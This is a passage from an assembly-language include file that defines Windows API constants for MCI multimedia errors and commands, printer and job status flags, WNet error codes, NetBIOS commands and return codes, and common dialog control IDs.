MCIERR_DRIVER equ MCIERR_BASE+22
MCIERR_CANNOT_USE_ALL equ MCIERR_BASE+23
MCIERR_MULTIPLE equ MCIERR_BASE+24
MCIERR_EXTENSION_NOT_FOUND equ MCIERR_BASE+25
MCIERR_OUTOFRANGE equ MCIERR_BASE+26
MCIERR_FLAGS_NOT_COMPATIBLE equ MCIERR_BASE+28
MCIERR_FILE_NOT_SAVED equ MCIERR_BASE+30
MCIERR_DEVICE_TYPE_REQUIRED equ MCIERR_BASE+31
MCIERR_DEVICE_LOCKED equ MCIERR_BASE+32
MCIERR_DUPLICATE_ALIAS equ MCIERR_BASE+33
MCIERR_BAD_CONSTANT equ MCIERR_BASE+34
MCIERR_MUST_USE_SHAREABLE equ MCIERR_BASE+35
MCIERR_MISSING_DEVICE_NAME equ MCIERR_BASE+36
MCIERR_BAD_TIME_FORMAT equ MCIERR_BASE+37
MCIERR_NO_CLOSING_QUOTE equ MCIERR_BASE+38
MCIERR_DUPLICATE_FLAGS equ MCIERR_BASE+39
MCIERR_INVALID_FILE equ MCIERR_BASE+40
MCIERR_NULL_PARAMETER_BLOCK equ MCIERR_BASE+41
MCIERR_UNNAMED_RESOURCE equ MCIERR_BASE+42
MCIERR_NEW_REQUIRES_ALIAS equ MCIERR_BASE+43
MCIERR_NOTIFY_ON_AUTO_OPEN equ MCIERR_BASE+44
MCIERR_NO_ELEMENT_ALLOWED equ MCIERR_BASE+45
MCIERR_NONAPPLICABLE_FUNCTION equ MCIERR_BASE+46
MCIERR_ILLEGAL_FOR_AUTO_OPEN equ MCIERR_BASE+47
MCIERR_FILENAME_REQUIRED equ MCIERR_BASE+48
MCIERR_EXTRA_CHARACTERS equ MCIERR_BASE+49
MCIERR_DEVICE_NOT_INSTALLED equ MCIERR_BASE+50
MCIERR_GET_CD equ MCIERR_BASE+51
MCIERR_SET_CD equ MCIERR_BASE+52
MCIERR_SET_DRIVE equ MCIERR_BASE+53
MCIERR_DEVICE_LENGTH equ MCIERR_BASE+54
MCIERR_DEVICE_ORD_LENGTH equ MCIERR_BASE+55
MCIERR_NO_INTEGER equ MCIERR_BASE+56
MCIERR_WAVE_OUTPUTSINUSE equ MCIERR_BASE+64
MCIERR_WAVE_SETOUTPUTINUSE equ MCIERR_BASE+65
MCIERR_WAVE_INPUTSINUSE equ MCIERR_BASE+66
MCIERR_WAVE_SETINPUTINUSE equ MCIERR_BASE+67
MCIERR_WAVE_OUTPUTUNSPECIFIED equ MCIERR_BASE+68
MCIERR_WAVE_INPUTUNSPECIFIED equ MCIERR_BASE+69
MCIERR_WAVE_OUTPUTSUNSUITABLE equ MCIERR_BASE+70
MCIERR_WAVE_SETOUTPUTUNSUITABLE equ MCIERR_BASE+71
MCIERR_WAVE_INPUTSUNSUITABLE equ MCIERR_BASE+72
MCIERR_WAVE_SETINPUTUNSUITABLE equ MCIERR_BASE+73
MCIERR_SEQ_DIV_INCOMPATIBLE equ MCIERR_BASE+80
MCIERR_SEQ_PORT_INUSE equ MCIERR_BASE+81
MCIERR_SEQ_PORT_NONEXISTENT equ MCIERR_BASE+82
MCIERR_SEQ_PORT_MAPNODEVICE equ MCIERR_BASE+83
MCIERR_SEQ_PORT_MISCERROR equ MCIERR_BASE+84
MCIERR_SEQ_TIMER equ MCIERR_BASE+85
MCIERR_SEQ_PORTUNSPECIFIED equ MCIERR_BASE+86
MCIERR_SEQ_NOMIDIPRESENT equ MCIERR_BASE+87
MCIERR_NO_WINDOW equ MCIERR_BASE+90
MCIERR_CREATEWINDOW equ MCIERR_BASE+91
MCIERR_FILE_READ equ MCIERR_BASE+92
MCIERR_FILE_WRITE equ MCIERR_BASE+93
MCIERR_CUSTOM_DRIVER_BASE equ MCIERR_BASE+256
MCI_FIRST equ 800h
MCI_OPEN equ 803h
MCI_CLOSE equ 804h
MCI_ESCAPE equ 805h
MCI_PLAY equ 806h
MCI_SEEK equ 807h
MCI_STOP equ 808h
MCI_PAUSE equ 809h
MCI_INFO equ 80Ah
MCI_GETDEVCAPS equ 80Bh
MCI_SPIN equ 80Ch
MCI_SET equ 80Dh
MCI_STEP equ 80Eh
MCI_RECORD equ 80Fh
MCI_SYSINFO equ 810h
MCI_BREAK equ 811h
MCI_SOUND equ 812h
MCI_SAVE equ 813h
MCI_STATUS equ 814h
MCI_CUE equ 830h
MCI_REALIZE equ 840h
MCI_WINDOW equ 841h
MCI_PUT equ 842h
MCI_WHERE equ 843h
MCI_FREEZE equ 844h
MCI_UNFREEZE equ 845h
MCI_LOAD equ 850h
MCI_CUT equ 851h
MCI_COPY equ 852h
MCI_PASTE equ 853h
MCI_UPDATE equ 854h
MCI_RESUME equ 855h
MCI_DELETE equ 856h
MCI_LAST equ 0FFFh
MCI_USER_MESSAGES equ 400h+MCI_FIRST
MCI_ALL_DEVICE_ID equ -1
MCI_DEVTYPE_VCR equ 513
MCI_DEVTYPE_VIDEODISC equ 514
MCI_DEVTYPE_OVERLAY equ 515
MCI_DEVTYPE_CD_AUDIO equ 516
MCI_DEVTYPE_DAT equ 517
MCI_DEVTYPE_SCANNER equ 518
MCI_DEVTYPE_ANIMATION equ 519
MCI_DEVTYPE_DIGITAL_VIDEO equ 520
MCI_DEVTYPE_OTHER equ 521
MCI_DEVTYPE_WAVEFORM_AUDIO equ 522
MCI_DEVTYPE_SEQUENCER equ 523
MCI_DEVTYPE_FIRST equ MCI_DEVTYPE_VCR
MCI_DEVTYPE_LAST equ MCI_DEVTYPE_SEQUENCER
MCI_DEVTYPE_FIRST_USER equ 1000h
MCI_MODE_NOT_READY equ MCI_STRING_OFFSET+12
MCI_MODE_STOP equ MCI_STRING_OFFSET+13
MCI_MODE_PLAY equ MCI_STRING_OFFSET+14
MCI_MODE_RECORD equ MCI_STRING_OFFSET+15
MCI_MODE_SEEK equ MCI_STRING_OFFSET+16
MCI_MODE_PAUSE equ MCI_STRING_OFFSET+17
MCI_MODE_OPEN equ MCI_STRING_OFFSET+18
MCI_FORMAT_MILLISECONDS equ 0
MCI_FORMAT_HMS equ 1
MCI_FORMAT_MSF equ 2
MCI_FORMAT_FRAMES equ 3
MCI_FORMAT_SMPTE_24 equ 4
MCI_FORMAT_SMPTE_25 equ 5
MCI_FORMAT_SMPTE_30 equ 6
MCI_FORMAT_SMPTE_30DROP equ 7
MCI_FORMAT_BYTES equ 8
MCI_FORMAT_SAMPLES equ 9
MCI_FORMAT_TMSF equ 10
MCI_NOTIFY_SUCCESSFUL equ 1h
MCI_NOTIFY_SUPERSEDED equ 2h
MCI_NOTIFY_ABORTED equ 4h
MCI_NOTIFY_FAILURE equ 8h
MCI_NOTIFY equ 1h
MCI_WAIT equ 2h
MCI_FROM equ 4h
MCI_TO equ 8h
MCI_TRACK equ 10h
MCI_OPEN_SHAREABLE equ 100h
MCI_OPEN_ELEMENT equ 200h
MCI_OPEN_ALIAS equ 400h
MCI_OPEN_ELEMENT_ID equ 800h
MCI_OPEN_TYPE_ID equ 1000h
MCI_OPEN_TYPE equ 2000h
MCI_SEEK_TO_START equ 100h
MCI_SEEK_TO_END equ 200h
MCI_STATUS_ITEM equ 100h
MCI_STATUS_START equ 200h
MCI_STATUS_LENGTH equ 1h
MCI_STATUS_POSITION equ 2h
MCI_STATUS_NUMBER_OF_TRACKS equ 3h
MCI_STATUS_MODE equ 4h
MCI_STATUS_MEDIA_PRESENT equ 5h
MCI_STATUS_TIME_FORMAT equ 6h
MCI_STATUS_READY equ 7h
MCI_STATUS_CURRENT_TRACK equ 8h
MCI_INFO_PRODUCT equ 100h
MCI_INFO_FILE equ 200h
MCI_GETDEVCAPS_ITEM equ 100h
MCI_GETDEVCAPS_CAN_RECORD equ 1h
MCI_GETDEVCAPS_HAS_AUDIO equ 2h
MCI_GETDEVCAPS_HAS_VIDEO equ 3h
MCI_GETDEVCAPS_DEVICE_TYPE equ 4h
MCI_GETDEVCAPS_USES_FILES equ 5h
MCI_GETDEVCAPS_COMPOUND_DEVICE equ 6h
MCI_GETDEVCAPS_CAN_EJECT equ 7h
MCI_GETDEVCAPS_CAN_PLAY equ 8h
MCI_GETDEVCAPS_CAN_SAVE equ 9h
MCI_SYSINFO_QUANTITY equ 100h
MCI_SYSINFO_OPEN equ 200h
MCI_SYSINFO_NAME equ 400h
MCI_SYSINFO_INSTALLNAME equ 800h
MCI_SET_DOOR_OPEN equ 100h
MCI_SET_DOOR_CLOSED equ 200h
MCI_SET_TIME_FORMAT equ 400h
MCI_SET_AUDIO equ 800h
MCI_SET_VIDEO equ 1000h
MCI_SET_ON equ 2000h
MCI_SET_OFF equ 4000h
MCI_SET_AUDIO_ALL equ 4001h
MCI_SET_AUDIO_LEFT equ 4002h
MCI_SET_AUDIO_RIGHT equ 4003h
MCI_BREAK_KEY equ 100h
MCI_BREAK_HWND equ 200h
MCI_BREAK_OFF equ 400h
MCI_RECORD_INSERT equ 100h
MCI_RECORD_OVERWRITE equ 200h
MCI_SOUND_NAME equ 100h
MCI_SAVE_FILE equ 100h
MCI_LOAD_FILE equ 100h
MCI_VD_MODE_PARK equ MCI_VD_OFFSET+1
MCI_VD_MEDIA_CLV equ MCI_VD_OFFSET+2
MCI_VD_MEDIA_CAV equ MCI_VD_OFFSET+3
MCI_VD_MEDIA_OTHER equ MCI_VD_OFFSET+4
MCI_VD_FORMAT_TRACK equ 4001h
MCI_VD_PLAY_REVERSE equ 10000h
MCI_VD_PLAY_FAST equ 20000h
MCI_VD_PLAY_SPEED equ 40000h
MCI_VD_PLAY_SCAN equ 80000h
MCI_VD_PLAY_SLOW equ 100000h
MCI_VD_SEEK_REVERSE equ 10000h
MCI_VD_STATUS_SPEED equ 4002h
MCI_VD_STATUS_FORWARD equ 4003h
MCI_VD_STATUS_MEDIA_TYPE equ 4004h
MCI_VD_STATUS_SIDE equ 4005h
MCI_VD_STATUS_DISC_SIZE equ 4006h
MCI_VD_GETDEVCAPS_CLV equ 10000h
MCI_VD_GETDEVCAPS_CAV equ 20000h
MCI_VD_SPIN_UP equ 10000h
MCI_VD_SPIN_DOWN equ 20000h
MCI_VD_GETDEVCAPS_CAN_REVERSE equ 4002h
MCI_VD_GETDEVCAPS_FAST_RATE equ 4003h
MCI_VD_GETDEVCAPS_SLOW_RATE equ 4004h
MCI_VD_GETDEVCAPS_NORMAL_RATE equ 4005h
MCI_VD_STEP_FRAMES equ 10000h
MCI_VD_STEP_REVERSE equ 20000h
MCI_VD_ESCAPE_STRING equ 100h
MCI_WAVE_PCM equ MCI_WAVE_OFFSET+0
MCI_WAVE_MAPPER equ MCI_WAVE_OFFSET+1
MCI_WAVE_OPEN_BUFFER equ 10000h
MCI_WAVE_SET_FORMATTAG equ 10000h
MCI_WAVE_SET_CHANNELS equ 20000h
MCI_WAVE_SET_SAMPLESPERSEC equ 40000h
MCI_WAVE_SET_AVGBYTESPERSEC equ 80000h
MCI_WAVE_SET_BLOCKALIGN equ 100000h
MCI_WAVE_SET_BITSPERSAMPLE equ 200000h
MCI_WAVE_INPUT equ 400000h
MCI_WAVE_OUTPUT equ 800000h
MCI_WAVE_STATUS_FORMATTAG equ 4001h
MCI_WAVE_STATUS_CHANNELS equ 4002h
MCI_WAVE_STATUS_SAMPLESPERSEC equ 4003h
MCI_WAVE_STATUS_AVGBYTESPERSEC equ 4004h
MCI_WAVE_STATUS_BLOCKALIGN equ 4005h
MCI_WAVE_STATUS_BITSPERSAMPLE equ 4006h
MCI_WAVE_STATUS_LEVEL equ 4007h
MCI_WAVE_SET_ANYINPUT equ 4000000h
MCI_WAVE_SET_ANYOUTPUT equ 8000000h
MCI_WAVE_GETDEVCAPS_INPUTS equ 4001h
MCI_WAVE_GETDEVCAPS_OUTPUTS equ 4002h
MCI_SEQ_DIV_PPQN equ 0+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_24 equ 1+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_25 equ 2+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_30DROP equ 3+MCI_SEQ_OFFSET
MCI_SEQ_DIV_SMPTE_30 equ 4+MCI_SEQ_OFFSET
MCI_SEQ_FORMAT_SONGPTR equ 4001h
MCI_SEQ_FILE equ 4002h
MCI_SEQ_MIDI equ 4003h
MCI_SEQ_SMPTE equ 4004h
MCI_SEQ_NONE equ 65533
MCI_SEQ_MAPPER equ 65535
MCI_SEQ_STATUS_TEMPO equ 4002h
MCI_SEQ_STATUS_PORT equ 4003h
MCI_SEQ_STATUS_SLAVE equ 4007h
MCI_SEQ_STATUS_MASTER equ 4008h
MCI_SEQ_STATUS_OFFSET equ 4009h
MCI_SEQ_STATUS_DIVTYPE equ 400Ah
MCI_SEQ_SET_TEMPO equ 10000h
MCI_SEQ_SET_PORT equ 20000h
MCI_SEQ_SET_SLAVE equ 40000h
MCI_SEQ_SET_MASTER equ 80000h
MCI_SEQ_SET_OFFSET equ 1000000h
MCI_ANIM_OPEN_WS equ 10000h
MCI_ANIM_OPEN_PARENT equ 20000h
MCI_ANIM_OPEN_NOSTATIC equ 40000h
MCI_ANIM_PLAY_SPEED equ 10000h
MCI_ANIM_PLAY_REVERSE equ 20000h
MCI_ANIM_PLAY_FAST equ 40000h
MCI_ANIM_PLAY_SLOW equ 80000h
MCI_ANIM_PLAY_SCAN equ 100000h
MCI_ANIM_STEP_REVERSE equ 10000h
MCI_ANIM_STEP_FRAMES equ 20000h
MCI_ANIM_STATUS_SPEED equ 4001h
MCI_ANIM_STATUS_FORWARD equ 4002h
MCI_ANIM_STATUS_HWND equ 4003h
MCI_ANIM_STATUS_HPAL equ 4004h
MCI_ANIM_STATUS_STRETCH equ 4005h
MCI_ANIM_INFO_TEXT equ 10000h
MCI_ANIM_GETDEVCAPS_CAN_REVERSE equ 4001h
MCI_ANIM_GETDEVCAPS_FAST_RATE equ 4002h
MCI_ANIM_GETDEVCAPS_SLOW_RATE equ 4003h
MCI_ANIM_GETDEVCAPS_NORMAL_RATE equ 4004h
MCI_ANIM_GETDEVCAPS_PALETTES equ 4006h
MCI_ANIM_GETDEVCAPS_CAN_STRETCH equ 4007h
MCI_ANIM_GETDEVCAPS_MAX_WINDOWS equ 4008h
MCI_ANIM_REALIZE_NORM equ 10000h
MCI_ANIM_REALIZE_BKGD equ 20000h
MCI_ANIM_WINDOW_HWND equ 10000h
MCI_ANIM_WINDOW_STATE equ 40000h
MCI_ANIM_WINDOW_TEXT equ 80000h
MCI_ANIM_WINDOW_ENABLE_STRETCH equ 100000h
MCI_ANIM_WINDOW_DISABLE_STRETCH equ 200000h
MCI_ANIM_WINDOW_DEFAULT equ 0h
MCI_ANIM_RECT equ 10000h
MCI_ANIM_PUT_SOURCE equ 20000h
MCI_ANIM_PUT_DESTINATION equ 40000h
MCI_ANIM_WHERE_SOURCE equ 20000h
MCI_ANIM_WHERE_DESTINATION equ 40000h
MCI_ANIM_UPDATE_HDC equ 20000h
MCI_OVLY_OPEN_WS equ 10000h
MCI_OVLY_OPEN_PARENT equ 20000h
MCI_OVLY_STATUS_HWND equ 4001h
MCI_OVLY_STATUS_STRETCH equ 4002h
MCI_OVLY_INFO_TEXT equ 10000h
MCI_OVLY_GETDEVCAPS_CAN_STRETCH equ 4001h
MCI_OVLY_GETDEVCAPS_CAN_FREEZE equ 4002h
MCI_OVLY_GETDEVCAPS_MAX_WINDOWS equ 4003h
MCI_OVLY_WINDOW_HWND equ 10000h
MCI_OVLY_WINDOW_STATE equ 40000h
MCI_OVLY_WINDOW_TEXT equ 80000h
MCI_OVLY_WINDOW_ENABLE_STRETCH equ 100000h
MCI_OVLY_WINDOW_DISABLE_STRETCH equ 200000h
MCI_OVLY_WINDOW_DEFAULT equ 0h
MCI_OVLY_RECT equ 10000h
MCI_OVLY_PUT_SOURCE equ 20000h
MCI_OVLY_PUT_DESTINATION equ 40000h
MCI_OVLY_PUT_FRAME equ 80000h
MCI_OVLY_PUT_VIDEO equ 100000h
MCI_OVLY_WHERE_SOURCE equ 20000h
MCI_OVLY_WHERE_DESTINATION equ 40000h
MCI_OVLY_WHERE_FRAME equ 80000h
MCI_OVLY_WHERE_VIDEO equ 100000h
CAPS1 equ 94
C1_TRANSPARENT equ 1h
NEWTRANSPARENT equ 3
QUERYROPSUPPORT equ 40
SELECTDIB equ 41
SE_ERR_SHARE equ 26
SE_ERR_ASSOCINCOMPLETE equ 27
SE_ERR_DDETIMEOUT equ 28
SE_ERR_DDEFAIL equ 29
SE_ERR_DDEBUSY equ 30
SE_ERR_NOASSOC equ 31
PRINTER_CONTROL_PAUSE equ 1
PRINTER_CONTROL_RESUME equ 2
PRINTER_CONTROL_PURGE equ 3
PRINTER_STATUS_PAUSED equ 1h
PRINTER_STATUS_ERROR equ 2h
PRINTER_STATUS_PENDING_DELETION equ 4h
PRINTER_STATUS_PAPER_JAM equ 8h
PRINTER_STATUS_PAPER_OUT equ 10h
PRINTER_STATUS_MANUAL_FEED equ 20h
PRINTER_STATUS_PAPER_PROBLEM equ 40h
PRINTER_STATUS_OFFLINE equ 80h
PRINTER_STATUS_IO_ACTIVE equ 100h
PRINTER_STATUS_BUSY equ 200h
PRINTER_STATUS_PRINTING equ 400h
PRINTER_STATUS_OUTPUT_BIN_FULL equ 800h
PRINTER_STATUS_NOT_AVAILABLE equ 1000h
PRINTER_STATUS_WAITING equ 2000h
PRINTER_STATUS_PROCESSING equ 4000h
PRINTER_STATUS_INITIALIZING equ 8000h
PRINTER_STATUS_WARMING_UP equ 10000h
PRINTER_STATUS_TONER_LOW equ 20000h
PRINTER_STATUS_NO_TONER equ 40000h
PRINTER_STATUS_PAGE_PUNT equ 80000h
PRINTER_STATUS_USER_INTERVENTION equ 100000h
PRINTER_STATUS_OUT_OF_MEMORY equ 200000h
PRINTER_STATUS_DOOR_OPEN equ 400000h
PRINTER_ATTRIBUTE_QUEUED equ 1h
PRINTER_ATTRIBUTE_DIRECT equ 2h
PRINTER_ATTRIBUTE_DEFAULT equ 4h
PRINTER_ATTRIBUTE_SHARED equ 8h
PRINTER_ATTRIBUTE_NETWORK equ 10h
PRINTER_ATTRIBUTE_HIDDEN equ 20h
PRINTER_ATTRIBUTE_LOCAL equ 40h
NO_PRIORITY equ 0
MAX_PRIORITY equ 99
MIN_PRIORITY equ 1
DEF_PRIORITY equ 1
JOB_CONTROL_PAUSE equ 1
JOB_CONTROL_RESUME equ 2
JOB_CONTROL_CANCEL equ 3
JOB_CONTROL_RESTART equ 4
JOB_STATUS_PAUSED equ 1h
JOB_STATUS_ERROR equ 2h
JOB_STATUS_DELETING equ 4h
JOB_STATUS_SPOOLING equ 8h
JOB_STATUS_PRINTING equ 10h
JOB_STATUS_OFFLINE equ 20h
JOB_STATUS_PAPEROUT equ 40h
JOB_STATUS_PRINTED equ 80h
JOB_POSITION_UNSPECIFIED equ 0
FORM_BUILTIN equ 1h
PRINTER_CONTROL_SET_STATUS equ 4
PRINTER_ATTRIBUTE_WORK_OFFLINE equ 400h
PRINTER_ATTRIBUTE_ENABLE_BIDI equ 800h
JOB_CONTROL_DELETE equ 5
JOB_STATUS_USER_INTERVENTION equ 10000h
DI_CHANNEL equ 1
DI_READ_SPOOL_JOB equ 3
PORT_TYPE_WRITE equ 1h
PORT_TYPE_READ equ 2h
PORT_TYPE_REDIRECTED equ 4h
PORT_TYPE_NET_ATTACHED equ 8h
PRINTER_ENUM_DEFAULT equ 1h
PRINTER_ENUM_LOCAL equ 2h
PRINTER_ENUM_CONNECTIONS equ 4h
PRINTER_ENUM_FAVORITE equ 4h
PRINTER_ENUM_NAME equ 8h
PRINTER_ENUM_REMOTE equ 10h
PRINTER_ENUM_SHARED equ 20h
PRINTER_ENUM_NETWORK equ 40h
PRINTER_ENUM_EXPAND equ 4000h
PRINTER_ENUM_CONTAINER equ 8000h
PRINTER_ENUM_ICONMASK equ 0FF0000h
PRINTER_ENUM_ICON1 equ 10000h
PRINTER_ENUM_ICON2 equ 20000h
PRINTER_ENUM_ICON3 equ 40000h
PRINTER_ENUM_ICON4 equ 80000h
PRINTER_ENUM_ICON5 equ 100000h
PRINTER_ENUM_ICON6 equ 200000h
PRINTER_ENUM_ICON7 equ 400000h
PRINTER_ENUM_ICON8 equ 800000h
PRINTER_CHANGE_ADD_PRINTER equ 1h
PRINTER_CHANGE_SET_PRINTER equ 2h
PRINTER_CHANGE_DELETE_PRINTER equ 4h
PRINTER_CHANGE_PRINTER equ 0FFh
PRINTER_CHANGE_ADD_JOB equ 100h
PRINTER_CHANGE_SET_JOB equ 200h
PRINTER_CHANGE_DELETE_JOB equ 400h
PRINTER_CHANGE_WRITE_JOB equ 800h
PRINTER_CHANGE_JOB equ 0FF00h
PRINTER_CHANGE_ADD_FORM equ 10000h
PRINTER_CHANGE_SET_FORM equ 20000h
PRINTER_CHANGE_DELETE_FORM equ 40000h
PRINTER_CHANGE_FORM equ 70000h
PRINTER_CHANGE_ADD_PORT equ 100000h
PRINTER_CHANGE_CONFIGURE_PORT equ 200000h
PRINTER_CHANGE_DELETE_PORT equ 400000h
PRINTER_CHANGE_PORT equ 700000h
PRINTER_CHANGE_ADD_PRINT_PROCESSOR equ 1000000h
PRINTER_CHANGE_DELETE_PRINT_PROCESSOR equ 4000000h
PRINTER_CHANGE_PRINT_PROCESSOR equ 7000000h
PRINTER_CHANGE_ADD_PRINTER_DRIVER equ 10000000h
PRINTER_CHANGE_DELETE_PRINTER_DRIVER equ 40000000h
PRINTER_CHANGE_PRINTER_DRIVER equ 70000000h
PRINTER_CHANGE_TIMEOUT equ 80000000h
PRINTER_CHANGE_ALL equ 7777FFFFh
PRINTER_ERROR_INFORMATION equ 80000000h
PRINTER_ERROR_WARNING equ 40000000h
PRINTER_ERROR_SEVERE equ 20000000h
PRINTER_ERROR_OUTOFPAPER equ 1h
PRINTER_ERROR_JAM equ 2h
PRINTER_ERROR_OUTOFTONER equ 4h
SERVER_ACCESS_ADMINISTER equ 1h
SERVER_ACCESS_ENUMERATE equ 2h
PRINTER_ACCESS_ADMINISTER equ 4h
PRINTER_ACCESS_USE equ 8h
JOB_ACCESS_ADMINISTER equ 10h
SERVER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|SERVER_ACCESS_ADMINISTER|SERVER_ACCESS_ENUMERATE
SERVER_READ equ STANDARD_RIGHTS_READ|SERVER_ACCESS_ENUMERATE
SERVER_WRITE equ STANDARD_RIGHTS_WRITE|SERVER_ACCESS_ADMINISTER|SERVER_ACCESS_ENUMERATE
SERVER_EXECUTE equ STANDARD_RIGHTS_EXECUTE|SERVER_ACCESS_ENUMERATE
PRINTER_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|PRINTER_ACCESS_ADMINISTER|PRINTER_ACCESS_USE
PRINTER_READ equ STANDARD_RIGHTS_READ|PRINTER_ACCESS_USE
PRINTER_WRITE equ STANDARD_RIGHTS_WRITE|PRINTER_ACCESS_USE
PRINTER_EXECUTE equ STANDARD_RIGHTS_EXECUTE|PRINTER_ACCESS_USE
JOB_ALL_ACCESS equ STANDARD_RIGHTS_REQUIRED|JOB_ACCESS_ADMINISTER
JOB_READ equ STANDARD_RIGHTS_READ|JOB_ACCESS_ADMINISTER
JOB_WRITE equ STANDARD_RIGHTS_WRITE|JOB_ACCESS_ADMINISTER
JOB_EXECUTE equ STANDARD_RIGHTS_EXECUTE|JOB_ACCESS_ADMINISTER
RESOURCE_CONNECTED equ 1h
RESOURCE_PUBLICNET equ 2h
RESOURCE_GLOBALNET equ 2h
RESOURCE_REMEMBERED equ 3h
RESOURCE_RECENT equ 4h
RESOURCE_CONTEXT equ 5h
RESOURCETYPE_ANY equ 0h
RESOURCETYPE_DISK equ 1h
RESOURCETYPE_PRINT equ 2h
RESOURCETYPE_UNKNOWN equ 0FFFFh
RESOURCEUSAGE_CONNECTABLE equ 1h
RESOURCEUSAGE_CONTAINER equ 2h
RESOURCEUSAGE_RESERVED equ 80000000h
RESOURCEDISPLAYTYPE_GENERIC equ 0h
RESOURCEDISPLAYTYPE_DOMAIN equ 1h
RESOURCEDISPLAYTYPE_SERVER equ 2h
RESOURCEDISPLAYTYPE_SHARE equ 3h
RESOURCEDISPLAYTYPE_FILE equ 4h
RESOURCEDISPLAYTYPE_GROUP equ 5h
CONNECT_UPDATE_PROFILE equ 1h
WN_SUCCESS equ NO_ERROR
WN_NOT_SUPPORTED equ ERROR_NOT_SUPPORTED
WN_NET_ERROR equ ERROR_UNEXP_NET_ERR
WN_MORE_DATA equ ERROR_MORE_DATA
WN_BAD_POINTER equ ERROR_INVALID_ADDRESS
WN_BAD_VALUE equ ERROR_INVALID_PARAMETER
WN_BAD_PASSWORD equ ERROR_INVALID_PASSWORD
WN_ACCESS_DENIED equ ERROR_ACCESS_DENIED
WN_FUNCTION_BUSY equ ERROR_BUSY
WN_WINDOWS_ERROR equ ERROR_UNEXP_NET_ERR
WN_BAD_USER equ ERROR_BAD_USERNAME
WN_OUT_OF_MEMORY equ ERROR_NOT_ENOUGH_MEMORY
WN_NO_NETWORK equ ERROR_NO_NETWORK
WN_EXTENDED_ERROR equ ERROR_EXTENDED_ERROR
WN_NOT_CONNECTED equ ERROR_NOT_CONNECTED
WN_OPEN_FILES equ ERROR_OPEN_FILES
WN_DEVICE_IN_USE equ ERROR_DEVICE_IN_USE
WN_BAD_NETNAME equ ERROR_BAD_NET_NAME
WN_BAD_LOCALNAME equ ERROR_BAD_DEVICE
WN_ALREADY_CONNECTED equ ERROR_ALREADY_ASSIGNED
WN_DEVICE_ERROR equ ERROR_GEN_FAILURE
WN_CONNECTION_CLOSED equ ERROR_CONNECTION_UNAVAIL
WN_NO_NET_OR_BAD_PATH equ ERROR_NO_NET_OR_BAD_PATH
WN_BAD_PROVIDER equ ERROR_BAD_PROVIDER
WN_CANNOT_OPEN_PROFILE equ ERROR_CANNOT_OPEN_PROFILE
WN_BAD_PROFILE equ ERROR_BAD_PROFILE
WN_BAD_HANDLE equ ERROR_INVALID_HANDLE
WN_NO_MORE_ENTRIES equ ERROR_NO_MORE_ITEMS
WN_NOT_CONTAINER equ ERROR_NOT_CONTAINER
WN_NO_ERROR equ NO_ERROR
NCBNAMSZ equ 16
MAX_LANA equ 254
NAME_FLAGS_MASK equ 87h
GROUP_NAME equ 80h
UNIQUE_NAME equ 0h
REGISTERING equ 0h
REGISTERED equ 4h
DEREGISTERED equ 5h
DUPLICATE equ 6h
DUPLICATE_DEREG equ 7h
LISTEN_OUTSTANDING equ 1h
CALL_PENDING equ 2h
SESSION_ESTABLISHED equ 3h
HANGUP_PENDING equ 4h
HANGUP_COMPLETE equ 5h
SESSION_ABORTED equ 6h
NCBCALL equ 10h
NCBLISTEN equ 11h
NCBHANGUP equ 12h
NCBSEND equ 14h
NCBRECV equ 15h
NCBRECVANY equ 16h
NCBCHAINSEND equ 17h
NCBDGSEND equ 20h
NCBDGRECV equ 21h
NCBDGSENDBC equ 22h
NCBDGRECVBC equ 23h
NCBADDNAME equ 30h
NCBDELNAME equ 31h
NCBRESET equ 32h
NCBASTAT equ 33h
NCBSSTAT equ 34h
NCBCANCEL equ 35h
NCBADDGRNAME equ 36h
NCBENUM equ 37h
NCBUNLINK equ 70h
NCBSENDNA equ 71h
NCBCHAINSENDNA equ 72h
NCBLANSTALERT equ 73h
NCBACTION equ 77h
NCBFINDNAME equ 78h
NCBTRACE equ 79h
ASYNCH equ 80h
NRC_GOODRET equ 0h
NRC_BUFLEN equ 1h
NRC_ILLCMD equ 3h
NRC_CMDTMO equ 5h
NRC_INCOMP equ 6h
NRC_BADDR equ 7h
NRC_SNUMOUT equ 8h
NRC_NORES equ 9h
NRC_SCLOSED equ 0Ah
NRC_CMDCAN equ 0Bh
NRC_DUPNAME equ 0Dh
NRC_NAMTFUL equ 0Eh
NRC_ACTSES equ 0Fh
NRC_LOCTFUL equ 11h
NRC_REMTFUL equ 12h
NRC_ILLNN equ 13h
NRC_NOCALL equ 14h
NRC_NOWILD equ 15h
NRC_INUSE equ 16h
NRC_NAMERR equ 17h
NRC_SABORT equ 18h
NRC_NAMCONF equ 19h
NRC_IFBUSY equ 21h
NRC_TOOMANY equ 22h
NRC_BRIDGE equ 23h
NRC_CANOCCR equ 24h
NRC_CANCEL equ 26h
NRC_DUPENV equ 30h
NRC_ENVNOTDEF equ 34h
NRC_OSRESNOTAV equ 35h
NRC_MAXAPPS equ 36h
NRC_NOSAPS equ 37h
NRC_NORESOURCES equ 38h
NRC_INVADDRESS equ 39h
NRC_INVDDID equ 3Bh
NRC_LOCKFAIL equ 3Ch
NRC_OPENERR equ 3Fh
NRC_SYSTEM equ 40h
NRC_PENDING equ 0FFh
EXCEPTION_EXECUTE_HANDLER equ 1
EXCEPTION_CONTINUE_SEARCH equ 0
EXCEPTION_CONTINUE_EXECUTION equ -1
ctlFirst equ 400h
ctlLast equ 4FFh
psh1 equ 400h
psh2 equ 401h
psh3 equ 402h
psh4 equ 403h
psh5 equ 404h
psh6 equ 405h
psh7 equ 406h
psh8 equ 407h
psh9 equ 408h
psh10 equ 409h
psh11 equ 40Ah
psh12 equ 40Bh
psh13 equ 40Ch
psh14 equ 40Dh
psh15 equ 40Eh
pshHelp equ psh15
psh16 equ 40Fh
chx1 equ 410h
chx2 equ 411h
chx3 equ 412h
chx4 equ 413h
chx5 equ 414h
chx6 equ 415h
chx7 equ 416h
chx8 equ 417h
chx9 equ 418h
chx10 equ 419h
chx11 equ 41Ah
chx12 equ 41Bh
chx13 equ 41Ch
chx14 equ 41Dh
chx15 equ 41Eh
chx16 equ 41Fh
rad1 equ 420h
rad2 equ 421h
rad3 equ 422h
rad4 equ 423h
rad5 equ 424h
rad6 equ 425h
rad7 equ 426h
rad8 equ 427h
rad9 equ 428h
rad10 equ 429h
rad11 equ 42Ah
rad12 equ 42Bh
